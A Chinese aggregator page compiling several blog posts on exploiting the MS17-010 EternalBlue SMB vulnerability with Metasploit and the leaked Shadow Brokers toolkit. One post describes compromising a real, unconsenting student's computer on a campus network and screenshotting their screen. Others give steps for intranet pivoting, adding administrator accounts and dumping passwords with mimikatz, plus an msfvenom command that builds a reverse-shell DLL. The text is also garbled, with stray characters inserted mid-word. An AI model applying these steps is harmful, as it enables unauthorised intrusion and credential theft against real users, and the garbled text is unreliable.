导航:首页 > 编程大全 > eternalblue工具下载

eternalblue工具下载

发布时间:2024-08-26 21:01:48

⑴ MSF利用ms17_010实验

该漏洞具有非常大的危害性,这个漏洞导致攻击者在目虚巧标系统上可以执行任意代,包括格式化电脑删除重要的内容。
当然漏洞非常的古老了,防范只需要打个补丁,再不济关闭445端口。

首先打开终端输入
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
安装成功就能指令msfconsole来使用了

MSF功能不止汪首有利用ms17010,所以我们要选择对应的模块,其中利用到
auxiliary/scanner/smb/smb_ms17_010扫描工具模块
exploit/windows/smb/ms17_010_eternalblue利用工具模块

由于我实现环境是在校园网环境中,所以也就对校园网进行网段的扫描,我进入是我们的校园无线网络,连接不需要获得认证上网功能就可以实现漏洞攻击。

首先是查看自己IP

再利用扫描工具来对网段任何的B段进行扫描

扫出结果10.120.65.230IP存在漏洞风险,使用工具进行攻击差陵键

其中rhost为目标主机ip,lhost为自身监听ip

显示攻击成功了,这个时候,已经可以对被攻击者为所欲为了
打中后可以输入help来查看能执行的操作

screenshot来进行截图屏幕
发现在打游戏,偷偷的不要打扰到别人哦,上传一个txt提示他存在漏洞需要修复打补丁了呢,实验成功,点到为止哦。

⑵ 永恒之蓝复现[ms17-010]

在2017年5月12日,一场全球性的网络攻击事件爆发,源于对Windows网络共享协议的恶意蠕虫代码利用,此攻击源自NSA黑客工具包中名腔友为“永恒之蓝”(Eternalblue)的攻击程序。短短五小时内,欧洲、中国等多地的高校、企业内网和政府机构专网均受到波及,攻击者勒索高额赎金以换取文件解密权,对关键数据造成了严重影响。

在实际应对中,我发现不少主机仍未安装补丁,且由于某些环境因素(如不启用防火墙),使得攻击者容易得逞。这提醒我们在网络安全法的框架下,要时刻保持警惕,确保系统安全。

对于学习和复现这一攻击,其原理是通过TCP的445和139端口,利用SMBv1和NBT中的远程代码执行漏洞。恶意代码无需用户干预,只要设备联网,攻击者就能植入勒索软件等恶意程序。

受影响的Windows版本众多,包括Windows NT、2000到Windows 2012 SP0。在准备游岁阶段,我们可以在Windows7靶机(IP: 192.168.112.135)和Kali 2020攻击机(IP: 192.168.112.129)上使用nmap和metasploit工具进行操作。首先,通过nmap扫描主机的开放端口,确认是否可ping,如遇防火墙问题,需关闭。接着在metasploit中寻找并利用Eternalblue漏洞。

一旦利用成功,metasploit的meterpreter模式下,伍磨槐可以执行多种操作,如文件上传下载、密码获取、用户信息查询等。遇到乱码问题,可通过输入chcp 65001解决。

对于已受影响的系统,应尽快进行修复,具体版本可根据官方指南进行。同时,增强系统安全意识和补丁管理是防范此类攻击的关键。

⑶ 内网渗透之ms17-010

在内网渗透时,通常挂上代理后。在内网首先会打啵ms17-010。在实战中,使用msf的ms17-010模块,数次没有反弹成功。基于此,到底如何成功利用ms17-010

在msf成功接收session之后,添加路由

然后使用ms17-010相关的模块进行探测是否存在该漏洞。

尝试利用

LHOST配置为公网IP

可以看到success。漏洞是可以利用的,但始终没有session。不知道什么原因。
参考资料: 利用公网Msf+MS17010跨网段攻击内网
笔者在本地搭建环境,也是同样的结果。尝试更改payload为

bind_tcp攻击者去连接,容易被防火墙和杀毒发现
可以成功生成session,但并不稳定,且在run的过程中非常容易导致本来的session died

在实际使用msf的ms17_010_eternalblue模块时,笔者观察到有几个弊端。
1.session 很容易died
2.ms17_010_eternalblue模块利用起来非常耗时
3.无法利用成功
有大佬推荐使用原始的fb.py。但配置起来感觉麻烦一些。
所以。笔者从i春秋上找到一个轻便的方程式漏洞利用工具。
参考资料: 萌新初试MS17-010方程式漏洞
工具使用起来很简单。只需要msfvenom生成一个x64或x86的dll文件,替换该工具下的x64.dll或x86.dll 。再依次点击Eternalblue、Doublepulsar 的Attack即可。在Attack的时候,调用x64.dll动态链接库,反弹到公网IP。原理和fb.py一样。

笔者通过ew代理进内网后,在跳板机上上传了方程式漏洞利用工具、网安永恒之蓝检测工具。两者结合,威力巨大。成功利用ms17-010

对于windows server 2008 ,msfvenom生成x64.dll文件

msf配置

将该x64.dll替换到方程式利用工具下面。
只需要更换目标的IP,就可以获取session。

对于windows server 2003 ,msfvenom生成x86.dll文件

msf配置

进一步利用的一些命令

实际测试发现这种session非常稳定。不会轻易go die

实际测试server 2003的ms17-010时,有时候多次执行后msf就接收不到session,而且ms17-010利用时,脆弱的server 2003非常容易蓝屏。
所以笔者选择一种稳定可靠一些的办法。
先通过ms17_010_commend模块执行系统命令添加用户至管理员。再指定SMBPass和SMBUser来建立windows可访问命名管道[accessible named pipe]

参考资料 Metasploit 「永恒之蓝」两种模块的利弊

system的权限可以直接激活guest用户添加管理员组。

注意:使用ms17_010_psexec需要指定管理员的用户名、密码,否则没有session

同样的操作,载入mimikatz,读取管理员密码。

⑷ ms17-010:利用“永恒之蓝”攻陷一台计算机

我估摸着这两天大家都应该被一款老旧的勒索病毒刷爆了朋友圈,可能还有些同学不幸中招,那么是什么原因导致了这款勒索病毒如此猖狂?

这件事情还得从一个黑客组织说起,这个组织叫做Equation Group(方程式组织),这一黑客团伙与美国国家安全局(NSA)的关系一直十分密切。而且外界也普遍认为,Equation Group是美国国家安全局的一个下属部门。很多安全研究专家表示,Equation Group这一黑客组织所拥有的技术无论是从复杂程度还是从其先进程度来看,都已经超越了目前绝大多数的黑客团体,而且该黑客组织已经活跃了二十多年了。

然而,这个黑客组织被另一黑客团伙“The Shadow Brokers”(影子经纪人)给入侵了……(就是这么任性)。“The Shadow Brokers”(影子经纪人)自称他们从Equation Group手里拿到了很大一部分黑客工具,决定公开叫卖。

本以为能狠赚一笔,但实际上却没有人鸟他们,就橡陆圆是这么神奇。于梁塌是The Shadow Brokers决定公开一部分有价值的工具,其中“eternalblue”(永恒之蓝)就是其中之一(漏洞编号ms17-010)。那么永恒之蓝这个漏洞利用程序究竟牛X到什么地步呢?这么说吧,除了windows 10以外,windows系列的系统无一能够幸免。

于是乎,永恒之蓝漏洞利用悉孙程序+wannacry勒索软件程序造就了迄今为止最巨大的勒索交费活动,影响到近百个国家上千家企业及公共组织。

接下来,满足小白的好奇心,一起探究The Shadow Brokers公布的永恒之蓝漏洞利用程序,如何利用ms17-010攻陷一台64位windows 7。

攻击机1(192.168.1.101):
装有metasploit的linux
攻击机2(192.168.1.137):
可以运行The Shadow Brokers工具箱的windows xp->python2.6+ PyWin32 v2.12
靶机(192.168.1.140):
windows 7 x64(开放139、445端口)

利用The Shadow Brokers工具箱中的永恒之蓝利用程序攻陷靶机

修改后的路径与目录当前的路径一致

一路回车,直到输入项目名称处,输入项目名称

继续回车

继续一路回车,直到选择模式选择1

继续一路回车,直至攻击完成

相关命令:
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 lhost=192.168.1.101 lport=4444 -f dll -o ./backdoor.dll

一路回车,直到选择系统架构,由于我们要攻击的主机是win 7 x64位,故这里选择1

选择2 dll注入

Ps:喜欢的留个赞b( ̄▽ ̄)d ~也可以关注专题:黑客师。

阅读全文

与eternalblue工具下载相关的资料

热点内容
设置验证被拉入微信群 浏览:966
bubblegum教程 浏览:474
win7如何修改用户密码 浏览:169
逆战辅助销售网站源码 浏览:100
陕西回收贴片机如何编程 浏览:948
以前鲍鱼网站里的小说怎么没了 浏览:267
matlab程序如何调试 浏览:915
ps工程文件怎么发 浏览:95
word文件如何批量插入盖章 浏览:548
jscheckbox 浏览:338
pics规则文件 浏览:644
如何从数据中找出问题和机会 浏览:668
写作投稿在哪个网站好 浏览:895
绝代双骄版本 浏览:380
手机app在哪里找的对象靠谱吗 浏览:919
win10文件默认显示ck方式 浏览:829
如何更改桌面文件图标 浏览:418
word2010如何去掉背景 浏览:632
adp文件如何打开 浏览:531
ug编程怎么导出零件 浏览:586

友情链接